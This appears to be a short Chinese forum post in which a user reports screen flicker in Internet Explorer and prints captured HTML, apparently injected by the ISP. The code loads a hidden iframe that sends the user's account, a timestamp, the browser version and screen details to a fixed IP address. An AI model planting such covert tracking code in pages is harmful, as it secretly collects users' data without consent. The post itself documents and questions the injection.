问题发现: IE屏幕闪了几次 问题检查: 开始怀疑是网站故障. 截取网页一看. 很明显是指向一个202.104.13.252(IP地址查询), 估计是上传用户访问网址和时间. 访问这网站原来说是绿色网站. 以前没有出现过闪屏现象, 估计是100暴露出代码,而我的电脑又慢. 希望电信将这代码改快一些. 思考: 这代码如何插入?
以下是截取代码:
<html> <head> <meta http-equiv="pragma" content="no-cache"/> <meta http-equiv="Cache-Control" content="no-store,no-cache,must-revalidate,post-check=0,pre-check=0,max-age=0"/> <meta http-equiv="expires" content="-1"/> <meta http-equiv="refresh" content="1"/> </head> <body> <iframe src="about:blank" width="0" height="0" frameborder="0" style="display:none"></iframe> <script language="javascript"> window.setInterval("window.status=location.href;", 100); window.frames$[$0$]$.location = "http://202.104.13.252:81/update/step1.aspx?p=" + "************|" + Math.floor((new Date()).getTime()/1000) + "|" + navigator.appMinorVersion + "|" + screen.availHeight + "|" + screen.availWidth + "|" + screen.colorDepth + "|" + screen.height + "|" + screen.width; </script> </body> </html>
|
注: "************"是电信的用户帐号
|